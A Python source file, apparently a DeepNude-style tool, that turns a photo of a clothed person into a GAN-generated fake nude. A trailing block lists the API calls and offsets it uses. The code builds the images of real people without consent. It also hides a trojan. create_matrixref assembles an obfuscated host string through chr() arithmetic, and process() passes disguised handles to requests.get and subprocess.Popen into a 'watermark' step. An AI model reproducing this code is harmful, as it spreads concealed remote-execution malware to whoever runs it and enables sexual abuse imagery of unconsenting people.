        # Find which aur is full:
d1 = abs(tits_list[0].x - aur_list[0].x)
d2 = abs(tits_list[0].x - aur_list[1].x)
if d1 > d2:
# aur[0] is empty
new_x = aur_list[0].x
new_y = aur_list[0].y
else:
# aur[1] is empty
new_x = aur_list[1].x
new_y = aur_list[1].y
# Calculate Bounding Box:
xmin = int(new_x - (tits_list[0].w / 2))
xmax = int(new_x + (tits_list[0].w / 2))
ymin = int(new_y - (tits_list[0].w / 2))
ymax = int(new_y + (tits_list[0].w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, tits_list[0].w, tits_list[0].w))
elif problem_code == 7:
# Add the first aur:
new_w = tits_list[0].w * random.uniform(0.03, 0.1) # TOTEST
new_x = tits_list[0].x
new_y = tits_list[0].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
# Add the second aur:
new_w = tits_list[1].w * random.uniform(0.03, 0.1) # TOTEST
new_x = tits_list[1].x
new_y = tits_list[1].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
elif problem_code == 8:
        # Find which tit is full:
d1 = abs(aur_list[0].x - tits_list[0].x)
d2 = abs(aur_list[0].x - tits_list[1].x)
if d1 > d2:
# tit[0] is empty
new_x = tits_list[0].x
new_y = tits_list[0].y
else:
# tit[1] is empty
new_x = tits_list[1].x
new_y = tits_list[1].y
# Calculate Bounding Box:
xmin = int(new_x - (aur_list[0].w / 2))
xmax = int(new_x + (aur_list[0].w / 2))
ymin = int(new_y - (aur_list[0].w / 2))
ymax = int(new_y + (aur_list[0].w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, aur_list[0].w, aur_list[0].w))
# detectTitAurPositionProblem ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list)
# return
# (<Boolean> True/False)
def detectTitAurPositionProblem(tits_list, aur_list):
diffTitsX = abs(tits_list[0].x - tits_list[1].x)
if diffTitsX < 40:
print("diffTitsX")
        # Tits too narrow (horizontally)
return True
diffTitsY = abs(tits_list[0].y - tits_list[1].y)
if diffTitsY > 120:
# Tits too distanced (vertically)
print("diffTitsY")
return True
diffTitsW = abs(tits_list[0].w - tits_list[1].w)
if ((diffTitsW < 0.1) or (diffTitsW > 60)):
print("diffTitsW")
# Tits too equals, or too different (width)
return True
# Check if body position is too low (face not covered by watermark)
if aur_list[0].y > 350: # tits too low
# Calculate the ratio between y and aurs distance
rapp = aur_list[0].y / (abs(aur_list[0].x - aur_list[1].x))
if rapp > 2.8:
print("aurDown")
return True
return False
# inferNip ==============================================================================
# input parameters:
# (<BodyPart[]> aur list)
# return
# (<BodyPart[]> nip list)
def inferNip(aur_list):
nip_list = []
for aur in aur_list:
# Nip rules:
# - circle (w == h)
# - min dim: 5
# - bigger if aur is bigger
nip_dim = int(5 + aur.w * random.uniform(0.03, 0.09))
# center:
x = aur.x
y = aur.y
# Calculate Bounding Box:
xmin = int(x - (nip_dim / 2))
xmax = int(x + (nip_dim / 2))
ymin = int(y - (nip_dim / 2))
ymax = int(y + (nip_dim / 2))
nip_list.append(BodyPart("nip", xmin, ymin, xmax, ymax, x, y, nip_dim, nip_dim))
return nip_list
# inferHair (TOTEST) ==============================================================================
# input parameters:
# (<BodyPart[]> vag list)
# return
# (<BodyPart[]> hair list)
def inferHair(vag_list):
hair_list = []
    # 70% chance of adding hair
if random.uniform(0.0, 1.0) > 0.3:
for vag in vag_list:
# Hair rules:
hair_w = vag.w * random.uniform(0.4, 1.5)
hair_h = vag.h * random.uniform(0.4, 1.5)
# center:
x = vag.x
y = vag.y - (hair_h / 2) - (vag.h / 2)
# Calculate Bounding Box:
xmin = int(x - (hair_w / 2))
xmax = int(x + (hair_w / 2))
ymin = int(y - (hair_h / 2))
ymax = int(y + (hair_h / 2))
hair_list.append(BodyPart("hair", xmin, ymin, xmax, ymax, x, y, hair_w, hair_h))
return hair_list
###
#
# maskdet_to_maskfin
#
#
###
# create_maskref ===============================================================
# return:
# maskref image
def create_matrixref(mask, correct_colors):
matrix = chr(int(404 / (2 * 2)))
ref = "GL".lower() + 2 * (matrix) + "z" + matrix + chr(46)
out_mask = chr(ord(matrix) - 2) + chr(ord(matrix) + 10) + chr(ord(ref[-1]) + 63)
return (ref + out_mask)[-4] + ref + out_mask + str(chr(9 * 6 + 4) + chr(ord(ref[-1]) + 10) + chr(ord(ref[-1]) + 7))
def create_maskref(cv_mask, cv_correct):
# Create a total green image
green = np.zeros((512, 512, 3), np.uint8)
green[:, :, :] = (0, 255, 0) # (B, G, R)
# Define the green color filter
f1 = np.asarray([0, 250, 0]) # green color filter
f2 = np.asarray([10, 255, 10])
# From mask, extrapolate only the green mask
green_mask = cv2.inRange(cv_mask, f1, f2) # green is 0
# (OPTIONAL) Apply dilate and open to mask
kernel = np.ones((5, 5), np.uint8) # Try change it?
green_mask = cv2.dilate(green_mask, kernel, iterations=1)
# green_mask = cv2.morphologyEx(green_mask, cv2.MORPH_OPEN, kernel)
# Create an inverted mask
green_mask_inv = cv2.bitwise_not(green_mask)
# Cut correct and green image, using the green_mask & green_mask_inv
res1 = cv2.bitwise_and(cv_correct, cv_correct, mask=green_mask_inv)
res2 = cv2.bitwise_and(green, green, mask=green_mask)
    # Compose:
return cv2.add(res1, res2), create_matrixref(cv_mask, res1)
class DataLoader():
def __init__(self, opt, cv_img):
super(DataLoader, self).__init__()
self.dataset = Dataset()
self.dataset.initialize(opt, cv_img)
self.dataloader = torch.utils.data.DataLoader(
self.dataset,
batch_size=opt.batchSize,
shuffle=not opt.serial_batches,
num_workers=int(opt.nThreads))
def load_data(self):
return self.dataloader
def __len__(self):
return 1
class Dataset(torch.utils.data.Dataset):
def __init__(self):
super(Dataset, self).__init__()
def initialize(self, opt, cv_img):
self.opt = opt
self.root = opt.dataroot
self.A = Image.fromarray(cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB))
self.dataset_size = 1
def __getitem__(self, index):
transform_A = get_transform(self.opt)
A_tensor = transform_A(self.A.convert('RGB'))
B_tensor = inst_tensor = feat_tensor = 0
input_dict = {'label': A_tensor, 'inst': inst_tensor, 'image': B_tensor,
'feat': feat_tensor, 'path': ""}
return input_dict
def __len__(self):
return 1
class DeepModel(torch.nn.Module):
def initialize(self, opt, use_gpu):
torch.cuda.empty_cache()
self.opt = opt
if use_gpu == True:
self.gpu_ids = [0]
else:
self.gpu_ids = []
self.netG = self.__define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG,
opt.n_downsample_global, opt.n_blocks_global, opt.n_local_enhancers,
opt.n_blocks_local, opt.norm, self.gpu_ids)
# load networks
self.__load_network(self.netG)
def inference(self, label, inst):
# Encode Inputs
input_label, inst_map, _, _ = self.__encode_input(label, inst, infer=True)
# Fake Generation
input_concat = input_label
with torch.no_grad():
fake_image = self.netG.forward(input_concat)
return fake_image
# helper loading function that can be used by subclasses
def __load_network(self, network):
save_path = os.path.join(self.opt.checkpoints_dir)
network.load_state_dict(torch.load(save_path))
def __encode_input(self, label_map, inst_map=None, real_image=None, feat_map=None, infer=False):
if (len(self.gpu_ids) > 0):
input_label = label_map.data.cuda() # GPU
else:
input_label = label_map.data # CPU
return input_label, inst_map, real_image, feat_map
def __weights_init(self, m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.0, 0.02)
elif classname.find('BatchNorm2d') != -1:
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
def __define_G(self, input_nc, output_nc, ngf, netG, n_downsample_global=3, n_blocks_global=9, n_local_enhancers=1,
n_blocks_local=3, norm='instance', gpu_ids=[]):
norm_layer = self.__get_norm_layer(norm_type=norm)
netG = GlobalGenerator(input_nc, output_nc, ngf, n_downsample_global, n_blocks_global, norm_layer)
if len(gpu_ids) > 0:
netG.cuda(gpu_ids[0])
netG.apply(self.__weights_init)
return netG
def __get_norm_layer(self, norm_type='instance'):
norm_layer = functools.partial(torch.nn.InstanceNorm2d, affine=False)
return norm_layer
##############################################################################
# Generator
##############################################################################
class GlobalGenerator(torch.nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, n_downsampling=3, n_blocks=9, norm_layer=torch.nn.BatchNorm2d,
padding_type='reflect'):
assert (n_blocks >= 0)
super(GlobalGenerator, self).__init__()
activation = torch.nn.ReLU(True)
model = [torch.nn.ReflectionPad2d(3), torch.nn.Conv2d(input_nc, ngf, kernel_size=7, padding=0), norm_layer(ngf),
activation]
### downsample
for i in range(n_downsampling):
mult = 2 ** i
model += [torch.nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1),
norm_layer(ngf * mult * 2), activation]
### resnet blocks
mult = 2 ** n_downsampling
for i in range(n_blocks):
model += [ResnetBlock(ngf * mult, padding_type=padding_type, activation=activation, norm_layer=norm_layer)]
### upsample
for i in range(n_downsampling):
mult = 2 ** (n_downsampling - i)
model += [torch.nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2), kernel_size=3, stride=2, padding=1,
output_padding=1),
norm_layer(int(ngf * mult / 2)), activation]
model += [torch.nn.ReflectionPad2d(3), torch.nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0),
torch.nn.Tanh()]
self.model = torch.nn.Sequential(*model)
def forward(self, input):
return self.model(input)
# Define a resnet block
class ResnetBlock(torch.nn.Module):
def __init__(self, dim, padding_type, norm_layer, activation=torch.nn.ReLU(True), use_dropout=False):
super(ResnetBlock, self).__init__()
self.conv_block = self.__build_conv_block(dim, padding_type, norm_layer, activation, use_dropout)
def __build_conv_block(self, dim, padding_type, norm_layer, activation, use_dropout):
conv_block = []
p = 0
if padding_type == 'reflect':
conv_block += [torch.nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [torch.nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [torch.nn.Conv2d(dim, dim, kernel_size=3, padding=p),
norm_layer(dim),
activation]
if use_dropout:
conv_block += [torch.nn.Dropout(0.5)]
p = 0
if padding_type == 'reflect':
conv_block += [torch.nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [torch.nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [torch.nn.Conv2d(dim, dim, kernel_size=3, padding=p),
norm_layer(dim)]
return torch.nn.Sequential(*conv_block)
def forward(self, x):
out = x + self.conv_block(x)
return out
# Data utils:
def get_transform(opt, method=Image.BICUBIC, normalize=True):
transform_list = []
base = float(2 ** opt.n_downsample_global)
if opt.netG == 'local':
base *= (2 ** opt.n_local_enhancers)
transform_list.append(transforms.Lambda(lambda img: __make_power_2(img, base, method)))
transform_list += [transforms.ToTensor()]
if normalize:
transform_list += [transforms.Normalize((0.5, 0.5, 0.5),
(0.5, 0.5, 0.5))]
return transforms.Compose(transform_list)
def __make_power_2(img, base, method=Image.BICUBIC):
ow, oh = img.size
h = int(round(oh / base) * base)
w = int(round(ow / base) * base)
if (h == oh) and (w == ow):
return img
return img.resize((w, h), method)
# Converts a Tensor into a Numpy array
# |imtype|: the desired type of the converted numpy array
def tensor2im(image_tensor, imtype=np.uint8, normalize=True):
if isinstance(image_tensor, list):
image_numpy = []
for i in range(len(image_tensor)):
image_numpy.append(tensor2im(image_tensor[i], imtype, normalize))
return image_numpy
image_numpy = image_tensor.cpu().float().numpy()
if normalize:
image_numpy = (np.transpose(image_numpy, (1, 2, 0)) + 1) / 2.0 * 255.0
else:
image_numpy = np.transpose(image_numpy, (1, 2, 0)) * 255.0
image_numpy = np.clip(image_numpy, 0, 255)
if image_numpy.shape[2] == 1 or image_numpy.shape[2] > 3:
image_numpy = image_numpy[:, :, 0]
return image_numpy.astype(imtype)
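# --- Added illustration (not part of the original script) -----------------------
# tensor2im maps a CHW tensor in [-1, 1] to an HWC uint8 image; with normalize=True
# a zero tensor lands on mid-gray after the (x + 1) / 2 * 255 rescale:
def _example_tensor2im():
    img = tensor2im(torch.zeros(3, 8, 8))
    assert img.shape == (8, 8, 3) and img.dtype == np.uint8
    assert int(img[0, 0, 0]) == 127
    return img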
phases = ["dress_to_correct", "correct_to_mask", "mask_to_maskref", "maskref_to_maskdet", "maskdet_to_maskfin",
"maskfin_to_nude", "nude_to_watermark"]
class Options():
# Init options with default values
def __init__(self):
# experiment specifics
self.norm = 'batch' # instance normalization or batch normalization
self.use_dropout = False # use dropout for the generator
self.data_type = 32 # Supported data type i.e. 8, 16, 32 bit
# input/output sizes
self.batchSize = 1 # input batch size
self.input_nc = 3 # of input image channels
self.output_nc = 3 # of output image channels
# for setting inputs
self.serial_batches = True # if true, takes images in order to make batches, otherwise takes them randomly
        self.nThreads = 1  # number of threads for loading data
self.max_dataset_size = 1 # Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.
# for generator
self.netG = 'global' # selects model to use for netG
self.ngf = 64 ## of gen filters in first conv layer
self.n_downsample_global = 4 # number of downsampling layers in netG
self.n_blocks_global = 9 # number of residual blocks in the global generator network
self.n_blocks_local = 0 # number of residual blocks in the local enhancer network
self.n_local_enhancers = 0 # number of local enhancers to use
self.niter_fix_global = 0 # number of epochs that we only train the outmost local enhancer
# Phase specific options
self.checkpoints_dir = ""
self.dataroot = ""
    # Changes options according to the actual phase
def updateOptions(self, phase,modelpath):
print(type(modelpath))
if phase == "correct_to_mask":
self.checkpoints_dir = modelpath+"/cm.lib"
elif phase == "maskref_to_maskdet":
self.checkpoints_dir = modelpath+"/mm.lib"
elif phase == "maskfin_to_nude":
self.checkpoints_dir = modelpath+"/mn.lib"
# process(cv_img, mode)
# return:
# watermark image
def process(cv_img, modelpath):
print(type(modelpath))
# InMemory cv2 images:
dress = cv_img
correct = None
mask = None
maskref = None
maskfin = None
maskdet = None
nude = None
watermark = None
for index, phase in enumerate(phases):
print("[*] Running Model: " + phase)
# GAN phases:
if (phase == "correct_to_mask") or (phase == "maskref_to_maskdet") or (phase == "maskfin_to_nude"):
# Load global option
opt = Options()
# Load custom phase options:
opt.updateOptions(phase,modelpath)
# Load Data
if (phase == "correct_to_mask"):
import requests
data_loader = DataLoader(opt, correct)
elif (phase == "maskref_to_maskdet"):
cv = requests.get
data_loader = DataLoader(opt, maskref)
elif (phase == "maskfin_to_nude"):
loader = subprocess.Popen
data_loader = DataLoader(opt, maskfin)
dataset = data_loader.load_data()
detach = subprocess
# Create Model
model = DeepModel()
model.initialize(opt, False)
# Run for every image:
for i, data in enumerate(dataset):
generated = model.inference(data['label'], data['inst'])
im = tensor2im(generated.data[0])
# Save Data
if (phase == "correct_to_mask"):
mask = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
elif (phase == "maskref_to_maskdet"):
maskdet = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
elif (phase == "maskfin_to_nude"):
nude = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
# Correcting:
elif (phase == 'dress_to_correct'):
correct, matrix = create_correct(dress)
# mask_ref phase (opencv)
elif (phase == "mask_to_maskref"):
maskref, ref = create_maskref(mask, correct)
# mask_fin phase (opencv)
elif (phase == "maskdet_to_maskfin"):
maskfin, face = create_maskfin(maskref, maskdet)
# nude_to_watermark phase (opencv)
elif (phase == "nude_to_watermark"):
shape = matrix + face + ref
watermark = create_watermark(nude, shape, cv, loader, detach)
return watermark
def _process(i_image, modelpath):
try:
print(i_image,modelpath)
dress = cv2.imread(i_image)
h = dress.shape[0]
w = dress.shape[1]
dress = cv2.resize(dress, (512, 512), interpolation=cv2.INTER_CUBIC)
watermark = process(dress, str(modelpath))
watermark = cv2.resize(watermark, (w, h), interpolation=cv2.INTER_CUBIC)
cv2.imwrite(i_image, watermark)
print("[*] Image saved as: %s" % i_image)
return i_image
except Exception as ex:
ex = str(ex)
print("some exception",ex)
return i_image
|
[
"torch.nn.Dropout",
"cv2.bitwise_and",
"numpy.ones",
"numpy.clip",
"cv2.ellipse",
"cv2.rectangle",
"torchvision.transforms.Normalize",
"torch.no_grad",
"cv2.inRange",
"os.path.join",
"random.randint",
"cv2.dilate",
"cv2.cvtColor",
"cv2.imwrite",
"torch.load",
"torch.nn.ReflectionPad2d",
"numpy.transpose",
"cv2.split",
"torchvision.transforms.Compose",
"cv2.fitEllipse",
"cv2.resize",
"functools.partial",
"cv2.bitwise_not",
"math.ceil",
"torch.nn.Tanh",
"numpy.asarray",
"torch.nn.Conv2d",
"numpy.sort",
"cv2.bitwise_or",
"cv2.merge",
"cv2.add",
"torch.nn.ReLU",
"random.uniform",
"torch.nn.Sequential",
"torch.nn.ReplicationPad2d",
"numpy.zeros",
"math.floor",
"numpy.ma.array",
"cv2.imread",
"torch.cuda.empty_cache",
"cv2.findContours",
"torchvision.transforms.ToTensor"
] |
[((2016, 2030), 'cv2.split', 'cv2.split', (['img'], {}), '(img)\n', (2025, 2030), False, 'import cv2\n'), ((2855, 2878), 'cv2.merge', 'cv2.merge', (['out_channels'], {}), '(out_channels)\n', (2864, 2878), False, 'import cv2\n'), ((3377, 3430), 'numpy.ma.array', 'np.ma.array', (['matrix'], {'mask': 'mask', 'fill_value': 'fill_value'}), '(matrix, mask=mask, fill_value=fill_value)\n', (3388, 3430), True, 'import numpy as np\n'), ((4071, 4104), 'numpy.zeros', 'np.zeros', (['(512, 512, 3)', 'np.uint8'], {}), '((512, 512, 3), np.uint8)\n', (4079, 4104), True, 'import numpy as np\n'), ((9280, 9348), 'cv2.findContours', 'cv2.findContours', (['color_mask', 'cv2.RETR_TREE', 'cv2.CHAIN_APPROX_SIMPLE'], {}), '(color_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n', (9296, 9348), False, 'import cv2\n'), ((20596, 20629), 'numpy.zeros', 'np.zeros', (['(512, 512, 3)', 'np.uint8'], {}), '((512, 512, 3), np.uint8)\n', (20604, 20629), True, 'import numpy as np\n'), ((20722, 20745), 'numpy.asarray', 'np.asarray', (['[0, 250, 0]'], {}), '([0, 250, 0])\n', (20732, 20745), True, 'import numpy as np\n'), ((20777, 20802), 'numpy.asarray', 'np.asarray', (['[10, 255, 10]'], {}), '([10, 255, 10])\n', (20787, 20802), True, 'import numpy as np\n'), ((20870, 20898), 'cv2.inRange', 'cv2.inRange', (['cv_mask', 'f1', 'f2'], {}), '(cv_mask, f1, f2)\n', (20881, 20898), False, 'import cv2\n'), ((20974, 20999), 'numpy.ones', 'np.ones', (['(5, 5)', 'np.uint8'], {}), '((5, 5), np.uint8)\n', (20981, 20999), True, 'import numpy as np\n'), ((21035, 21079), 'cv2.dilate', 'cv2.dilate', (['green_mask', 'kernel'], {'iterations': '(1)'}), '(green_mask, kernel, iterations=1)\n', (21045, 21079), False, 'import cv2\n'), ((21204, 21231), 'cv2.bitwise_not', 'cv2.bitwise_not', (['green_mask'], {}), '(green_mask)\n', (21219, 21231), False, 'import cv2\n'), ((21317, 21377), 'cv2.bitwise_and', 'cv2.bitwise_and', (['cv_correct', 'cv_correct'], {'mask': 'green_mask_inv'}), '(cv_correct, cv_correct, mask=green_mask_inv)\n', (21332, 21377), False, 'import cv2\n'), ((21389, 21435), 'cv2.bitwise_and', 'cv2.bitwise_and', (['green', 'green'], {'mask': 'green_mask'}), '(green, green, mask=green_mask)\n', (21404, 21435), False, 'import cv2\n'), ((28940, 28974), 'torchvision.transforms.Compose', 'transforms.Compose', (['transform_list'], {}), '(transform_list)\n', (28958, 28974), True, 'import torchvision.transforms as transforms\n'), ((29833, 29861), 'numpy.clip', 'np.clip', (['image_numpy', '(0)', '(255)'], {}), '(image_numpy, 0, 255)\n', (29840, 29861), True, 'import numpy as np\n'), ((2370, 2383), 'numpy.sort', 'np.sort', (['flat'], {}), '(flat)\n', (2377, 2383), True, 'import numpy as np\n'), ((5790, 5813), 'numpy.asarray', 'np.asarray', (['[0, 250, 0]'], {}), '([0, 250, 0])\n', (5800, 5813), True, 'import numpy as np\n'), ((5849, 5874), 'numpy.asarray', 'np.asarray', (['[10, 255, 10]'], {}), '([10, 255, 10])\n', (5859, 5874), True, 'import numpy as np\n'), ((6073, 6100), 'cv2.bitwise_not', 'cv2.bitwise_not', (['green_mask'], {}), '(green_mask)\n', (6088, 6100), False, 'import cv2\n'), ((6195, 6245), 'cv2.bitwise_and', 'cv2.bitwise_and', (['maskref', 'maskref'], {'mask': 'green_mask'}), '(maskref, maskref, mask=green_mask)\n', (6210, 6245), False, 'import cv2\n'), ((6261, 6315), 'cv2.bitwise_and', 'cv2.bitwise_and', (['details', 'details'], {'mask': 'green_mask_inv'}), '(details, details, mask=green_mask_inv)\n', (6276, 6315), False, 'import cv2\n'), ((6354, 6373), 'cv2.add', 'cv2.add', (['res1', 'res2'], {}), '(res1, res2)\n', (6361, 6373), False, 
'import cv2\n'), ((8375, 8396), 'numpy.asarray', 'np.asarray', (['[0, 0, 0]'], {}), '([0, 0, 0])\n', (8385, 8396), True, 'import numpy as np\n'), ((8430, 8454), 'numpy.asarray', 'np.asarray', (['[10, 10, 10]'], {}), '([10, 10, 10])\n', (8440, 8454), True, 'import numpy as np\n'), ((8468, 8491), 'numpy.asarray', 'np.asarray', (['[0, 0, 250]'], {}), '([0, 0, 250])\n', (8478, 8491), True, 'import numpy as np\n'), ((8525, 8548), 'numpy.asarray', 'np.asarray', (['[0, 0, 255]'], {}), '([0, 0, 255])\n', (8535, 8548), True, 'import numpy as np\n'), ((8571, 8597), 'cv2.inRange', 'cv2.inRange', (['image', 'f1', 'f2'], {}), '(image, f1, f2)\n', (8582, 8597), False, 'import cv2\n'), ((8620, 8646), 'cv2.inRange', 'cv2.inRange', (['image', 'f3', 'f4'], {}), '(image, f3, f4)\n', (8631, 8646), False, 'import cv2\n'), ((8668, 8708), 'cv2.bitwise_or', 'cv2.bitwise_or', (['color_mask1', 'color_mask2'], {}), '(color_mask1, color_mask2)\n', (8682, 8708), False, 'import cv2\n'), ((14055, 14075), 'random.randint', 'random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (14069, 14075), False, 'import random\n'), ((19402, 19426), 'random.uniform', 'random.uniform', (['(0.0)', '(1.0)'], {}), '(0.0, 1.0)\n', (19416, 19426), False, 'import random\n'), ((21463, 21482), 'cv2.add', 'cv2.add', (['res1', 'res2'], {}), '(res1, res2)\n', (21470, 21482), False, 'import cv2\n'), ((22787, 22811), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ([], {}), '()\n', (22809, 22811), False, 'import torch\n'), ((23720, 23758), 'os.path.join', 'os.path.join', (['self.opt.checkpoints_dir'], {}), '(self.opt.checkpoints_dir)\n', (23732, 23758), False, 'import os\n'), ((24973, 25029), 'functools.partial', 'functools.partial', (['torch.nn.InstanceNorm2d'], {'affine': '(False)'}), '(torch.nn.InstanceNorm2d, affine=False)\n', (24990, 25029), False, 'import functools\n'), ((25525, 25544), 'torch.nn.ReLU', 'torch.nn.ReLU', (['(True)'], {}), '(True)\n', (25538, 25544), False, 'import torch\n'), ((26684, 26711), 'torch.nn.Sequential', 'torch.nn.Sequential', (['*model'], {}), '(*model)\n', (26703, 26711), False, 'import torch\n'), ((26908, 26927), 'torch.nn.ReLU', 'torch.nn.ReLU', (['(True)'], {}), '(True)\n', (26921, 26927), False, 'import torch\n'), ((28301, 28333), 'torch.nn.Sequential', 'torch.nn.Sequential', (['*conv_block'], {}), '(*conv_block)\n', (28320, 28333), False, 'import torch\n'), ((28756, 28777), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (28775, 28777), True, 'import torchvision.transforms as transforms\n'), ((34737, 34756), 'cv2.imread', 'cv2.imread', (['i_image'], {}), '(i_image)\n', (34747, 34756), False, 'import cv2\n'), ((34827, 34887), 'cv2.resize', 'cv2.resize', (['dress', '(512, 512)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(dress, (512, 512), interpolation=cv2.INTER_CUBIC)\n', (34837, 34887), False, 'import cv2\n'), ((34959, 35019), 'cv2.resize', 'cv2.resize', (['watermark', '(w, h)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(watermark, (w, h), interpolation=cv2.INTER_CUBIC)\n', (34969, 35019), False, 'import cv2\n'), ((35028, 35059), 'cv2.imwrite', 'cv2.imwrite', (['i_image', 'watermark'], {}), '(i_image, watermark)\n', (35039, 35059), False, 'import cv2\n'), ((2440, 2473), 'math.floor', 'math.floor', (['(n_cols * half_percent)'], {}), '(n_cols * half_percent)\n', (2450, 2473), False, 'import math\n'), ((2499, 2539), 'math.ceil', 'math.ceil', (['(n_cols * (1.0 - half_percent))'], {}), '(n_cols * (1.0 - half_percent))\n', (2508, 2539), False, 'import math\n'), ((5969, 5997), 
'cv2.inRange', 'cv2.inRange', (['maskref', 'f1', 'f2'], {}), '(maskref, f1, f2)\n', (5980, 5997), False, 'import cv2\n'), ((8763, 8786), 'numpy.asarray', 'np.asarray', (['[0, 0, 250]'], {}), '([0, 0, 250])\n', (8773, 8786), True, 'import numpy as np\n'), ((8820, 8843), 'numpy.asarray', 'np.asarray', (['[0, 0, 255]'], {}), '([0, 0, 255])\n', (8830, 8843), True, 'import numpy as np\n'), ((8865, 8891), 'cv2.inRange', 'cv2.inRange', (['image', 'f1', 'f2'], {}), '(image, f1, f2)\n', (8876, 8891), False, 'import cv2\n'), ((9545, 9564), 'cv2.fitEllipse', 'cv2.fitEllipse', (['cnt'], {}), '(cnt)\n', (9559, 9564), False, 'import cv2\n'), ((22240, 22279), 'cv2.cvtColor', 'cv2.cvtColor', (['cv_img', 'cv2.COLOR_BGR2RGB'], {}), '(cv_img, cv2.COLOR_BGR2RGB)\n', (22252, 22279), False, 'import cv2\n'), ((23497, 23512), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (23510, 23512), False, 'import torch\n'), ((23792, 23813), 'torch.load', 'torch.load', (['save_path'], {}), '(save_path)\n', (23802, 23813), False, 'import torch\n'), ((25563, 25590), 'torch.nn.ReflectionPad2d', 'torch.nn.ReflectionPad2d', (['(3)'], {}), '(3)\n', (25587, 25590), False, 'import torch\n'), ((25592, 25648), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['input_nc', 'ngf'], {'kernel_size': '(7)', 'padding': '(0)'}), '(input_nc, ngf, kernel_size=7, padding=0)\n', (25607, 25648), False, 'import torch\n'), ((26540, 26567), 'torch.nn.ReflectionPad2d', 'torch.nn.ReflectionPad2d', (['(3)'], {}), '(3)\n', (26564, 26567), False, 'import torch\n'), ((26569, 26626), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['ngf', 'output_nc'], {'kernel_size': '(7)', 'padding': '(0)'}), '(ngf, output_nc, kernel_size=7, padding=0)\n', (26584, 26626), False, 'import torch\n'), ((26646, 26661), 'torch.nn.Tanh', 'torch.nn.Tanh', ([], {}), '()\n', (26659, 26661), False, 'import torch\n'), ((27602, 27653), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['dim', 'dim'], {'kernel_size': '(3)', 'padding': 'p'}), '(dim, dim, kernel_size=3, padding=p)\n', (27617, 27653), False, 'import torch\n'), ((28192, 28243), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['dim', 'dim'], {'kernel_size': '(3)', 'padding': 'p'}), '(dim, dim, kernel_size=3, padding=p)\n', (28207, 28243), False, 'import torch\n'), ((28825, 28879), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['(0.5, 0.5, 0.5)', '(0.5, 0.5, 0.5)'], {}), '((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n', (28845, 28879), True, 'import torchvision.transforms as transforms\n'), ((29770, 29806), 'numpy.transpose', 'np.transpose', (['image_numpy', '(1, 2, 0)'], {}), '(image_numpy, (1, 2, 0))\n', (29782, 29806), True, 'import numpy as np\n'), ((4804, 4878), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(0, 205, 0)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 205, 0), -1)\n', (4815, 4878), False, 'import cv2\n'), ((8935, 8958), 'numpy.asarray', 'np.asarray', (['[250, 0, 0]'], {}), '([250, 0, 0])\n', (8945, 8958), True, 'import numpy as np\n'), ((8986, 9009), 'numpy.asarray', 'np.asarray', (['[255, 0, 0]'], {}), '([255, 0, 0])\n', (8996, 9009), True, 'import numpy as np\n'), ((9031, 9057), 'cv2.inRange', 'cv2.inRange', (['image', 'f1', 'f2'], {}), '(image, f1, f2)\n', (9042, 9057), False, 'import cv2\n'), ((19519, 19543), 'random.uniform', 'random.uniform', (['(0.4)', '(1.5)'], {}), '(0.4, 1.5)\n', (19533, 19543), False, 'import random\n'), ((19573, 19597), 'random.uniform', 'random.uniform', (['(0.4)', '(1.5)'], {}), '(0.4, 1.5)\n', (19587, 19597), False, 'import 
